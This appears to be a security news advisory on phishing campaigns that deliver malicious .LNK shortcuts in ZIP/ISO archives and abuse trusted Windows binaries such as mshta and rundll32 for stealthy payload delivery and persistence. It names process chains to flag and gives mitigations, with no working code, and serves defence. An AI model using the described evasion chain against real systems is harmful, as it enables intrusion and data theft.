Threat actors are increasingly using malicious Windows Shortcut files (.LNK) bundled inside packages (.ZIP,.ISO) to get beyond conventional security measures (such email gateway filters and basic antivirus software). These LNK files use Living Off The Land Binaries (LOLBins), which are trustworthy Windows programs, to covertly download and run malicious software. This method takes advantage of the confidence that is placed in essential Windows functions, making it challenging to identify the original infection. It is strongly advised that technical and user-focused mitigations be implemented right away. Systems used by consumers and businesses alike are seriously threatened by this campaign, particularly those whose privileges are enhanced.
A recent campaign uses malicious .LNK shortcut files to abuse trusted Windows binaries (e.g., mshta.exe, rundll32.exe) to fetch and execute malware while avoiding traditional detections. Delivered via spear‑phishing and compromised sites, the multi‑stage chain runs payloads largely in memory and establishes persistence via a registry Run key. We have divided the threat technicalities as follows:
Delivery and Infection Chain:
This threat is primarily delivered through highly developed social engineering techniques. Threat actors use email phishing to distribute malicious Windows Shortcut files (.LNK) disguised as compressed archives, typically.ZIP or larger container types such as.ISO or.IMG. This approach is specifically designed to get beyond typical email gateway security, which prohibits common executables. The infection chain begins when the user opens the archive and double-clicks the fraudulent LNK file, having been duped by the file name (for example, “Invoice,” “Shipping Update”). This action activates the LNK file’s embedded command, launching the next round of exploitation.
Threat Exploitation Process:
The attack abuses system trust to covertly carry out its payload as follows,
Technical Capabilities:
This attack vector’s technological skills focused on maximizing impact, stealth, and persistence. By evading perimeter defenses, the LNK/LOLBin combination provides a high success probability for initial ingress. Once on the system, the final payload, which may be a loader, Remote Access Trojan (RAT), or an advanced InfoStealer, uses methods such as altering Registry Run Keys or generating Scheduled Tasks to create strong persistence. This provides extended access for data exfiltration, such as the collection of proprietary files, system data, and browser credentials. The implementation of high-impact attacks, including enterprise-level ransomware, and lateral movement ultimately depend on this access.
Attribution and Evolution:
Since the approach is used by many advanced eCrime (cybercriminal) groups and particular malware families, such as Qakbot, IcedID, DarkGate, and different InfoStealers, attribution for LNK/LOLBin attacks is broad. The methodology has also been observed to be adopted by nation-state actors. In order to make identification and analysis more difficult, actors are continuing to evolve by adding layers of obfuscation, switching from straightforward ZIP files to more intricate containers like ISOs, and chaining several LOLBins together (e.g., LNK → mshta → powershell).
Active Campaign and Geographic Spread:
LNK-based phishing tactics are active, worldwide, and high volume, targeting enterprises from various sectors. While the threat is global, high-value targets in North America and Europe are continuously targeted, with a growing focus on vital infrastructure and financial sectors in APAC and MENA.
Conclusion:
An extremely effective and inexpensive attack vector is produced by combining the system-trusted LOLBin execution chain with the user-trusted LNK format. Traditional antivirus software and unsophisticated behavioral rules have a tough time detecting this LNK-based campaign because it uses trusted Windows binaries and in-memory execution to enable stealthy initial access and persistence. LNK attachments and unexpected mshta/rundll process chains should be regarded as high-risk by organizations. At the email gateway, mitigation must concentrate on aggressively blocking archive files that contain LNK and behaviorally detecting suspicious process chains. The most important last line of defense is still user knowledge
A successful LNK/LOLBin attack has a significant impact, typically resulting in the most destructive kinds of cybercrime. The initial breach rapidly progresses from simple info Theft (PII, passwords, proprietary info) to catastrophic occurrences. Because this method is a popular access point for groups such as IcedID and Qakbot, the immediate risk is ransomware deployment, which results in network-wide encryption and the associated expenses of business disruption, incident response, and reputational damage. The average cost of resolving these complex attacks is constantly substantial, especially for firms that experience successive multi-stage ransomware attacks.
https://securityonline.info/new-lnk-malware-uses-windows-lolbins-to-evade-detection/
